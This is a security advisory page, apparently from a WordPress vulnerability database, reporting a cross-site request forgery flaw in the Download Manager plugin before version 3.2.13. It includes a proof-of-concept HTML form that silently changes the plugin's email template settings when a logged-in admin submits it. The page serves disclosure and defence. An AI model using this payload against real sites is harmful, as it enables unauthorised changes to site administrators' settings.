logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

WordPress Download Manager < 3.2.13 - Email Template Setting Update via CSRF

Description

The plugin did not have CSRF check in place before saving its Email Template setting, allowing attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=wpdm_save_email_setting" method="POST">
      <input type="hidden" name="__wpdm_email_template" value="default.html" />
      <input type="hidden" name="__wpdm_email_setting[logo]" value="" />
      <input type="hidden" name="__wpdm_email_setting[banner]" value="" />
      <input type="hidden" name="__wpdm_email_setting[footer_text]" value="Changed Via CSRF" />
      <input type="hidden" name="__wpdm_email_setting[facebook]" value="" />
      <input type="hidden" name="__wpdm_email_setting[twitter]" value="" />
      <input type="hidden" name="__wpdm_email_setting[youtube]" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

download-manager

Fixed in version 3.2.13

References

URL

https://plugins.trac.wordpress.org/changeset/2577634

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CWE-352

Miscellaneous

Verified

Yes

WPVDB ID

115a6fd3-a723-4167-a9a3-379871f13fcb

Timeline

Publicly Published

2021-08-09 (about 2 months ago)

Added

2021-08-09 (about 2 months ago)

Last Updated

2021-08-09 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin